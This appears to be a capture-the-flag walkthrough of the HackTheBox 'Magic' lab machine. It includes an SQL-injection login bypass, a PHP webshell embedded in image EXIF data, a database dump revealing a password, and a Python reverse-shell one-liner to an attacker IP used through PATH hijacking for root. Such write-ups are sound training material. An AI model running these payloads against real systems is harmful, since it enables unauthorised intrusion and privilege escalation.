HTB Magic Walkthrough

Magic from HackTheBox marked as a medium Linux box. We exploit SQL injection weakness in a login form, to authenticate to admin panel, then we bypass upload restrictions by embedding a code execution vulnerability into an image EXIF data, and faking the image magic bytes using ExifTool, then we dump SQL database to get user privileges, and manipulate PATH variable to get root.

Reconnaissance

We start with Nmap scan to check open ports and the services that are running on the server

nmap -sT -sC -sV 10.10.10.185

• -sT to run TCP scan
• -sC to use Nmap default script scan
• -sV to enumerate service version

We see that we have:

• Port 22 ssh is open and it runs OpenSSH 7.6p1
• Port 80 HTTP is open and it runs apache/2.4.29

I ran gobuster to enumerate hidden directories

gobuster dir -u http://10.10.10.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

I didn’t get much of interesting stuff

So I ran Nikto in the background and went to enumerate the HTTP manually.

This is the web page that I got when I entered http://10.10.10.185/ it is an image gallery script

I checked the source code and I couldn’t find any important stuff hidden in there. So I pressed on the login on the lower-left corner, and I got a login page

I checked Nikto, and unfortunately, it couldn’t find any useful results, except the login page

Exploitation

Before brute-forcing the login page with Hydra, I started looking for low hanging fruits, I tried to SQL-inject the login page and the Username field was vulnerable to SQL injection I entered

admin’or’1'=’1

in the Username field and I bypassed the login form.

After bypassing the login page I got an upload script

I tried to upload a PHP reverse shell, but there was some restriction

I tried to manipulate the header of an Image, and embed shell in it, I tried to play with the extension of the shell. But all my attempt to bypass the restriction were in vain.

Then I came across this YouTube video, that explains how to embed a shell into an image EXIF data

I ran the following command on the image that I have

exiftool -DocumentName="<h1>RAZZOR<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" car.jpeg

And I got a new jpeg file, then I renamed it to car.php.jpeg

I tried to upload the new image file, and I succeed

Now we need to navigate to the file that we uploaded, I went to the main page http://10.10.10.185/ but I couldn’t find my image file in the gallery.

So I checked the source of the page, and I found that the images get uploaded to

/images/uploads

So I entered http://10.10.10.185/images/uploads/car.php.jpeg?cmd=ls

and BINGOOO

I managed to execute commands on the server

So I used the python reverse TCP code from pentest monkey, and I listened on port 4444 in my Kali machine and executed the reverse TCP code on the target machine, and I got a shell

I upgraded my shell to a fully interactive shell

python3 -c 'import pty;pty.spawn("/bin/bash");'
ctl+z
stty raw -echo
fg
export TERM=xterm-256color

Privilege Escalation

I start by enumerating the users on the server, and I found “theseus”

I started with the usual enumeration manually, and I found an interesting file named db.php5, in

var/www/Magic

It seems to be a script to connect to MySQL database, I tried the credentials to switch user using the “su” command, but I failed to authenticate

I tried to log in to MySQL using the credentials, but I couldn’t

So I tried to dump the Magic database using the following command

$ mysqldump -utheseus -piamkingtheseus Magic

And I got the data of the login table

I tried the “su” command now with the new discovered password, and BAAAM I am theseus now.

privilege escalation, phase two.

Escalating from user to root

I used a tool called suid3num. I transferred the tool from my Kali machine to the target machine using a simple python HTTP server

I gave the tool the permission 755, and I ran it

This tool gives you the SUID Binaries, and the default SUID Binaries, so it’s easy to compare and see what is sticking out, and I find a binary called sysinfo.

I googled it and I got

"sysinfo() returns certain statistics on memory and swap usage, as
       well as the load average."

I used “which” command to navigate to the tool, and “strings” command to see if there is interesting readable stuff in it

and I found that the tool is using other tools to do its job

So the tool is calling lshw to get Hardware Info, and fdisk to get disk info, so let's use “which” and “ls -la” to investigate who runs these tools

The tools(fdisk and lshw) are being run as root.

So we have a tool that is called “sysinfo”, that we can run with our current privileges, this tool is calling other tools that are running under root privileges.

So if we create a fake file and name it fdisk and write code to make a reverse TCP connection in it, and then fooled the system to run this fake file instead of the real one, through manipulating the “PATH variable”, we will get a shell as root.

I started listening on port 1337 using Netcat on my Kali machine, and I created a file and named it fdisk on the target machine containing a code for reverse connection using the“echo” command, and I gave it the permission 755

echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.64",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > fdisk

Then I manipulated the PATH variable to make it check /tmp directory for binaries

export PATH=/tmp:$PATH

Note: This article explains how PATH variable works, and how can we manipulate it to escalate privileges

Then I ran sysinfo, and the tool tried to call fdisk, and I’ve already created a malicious fdisk file and fooled the system to run the malicious file that I created instead of the real one, and I got a reverse shell as root.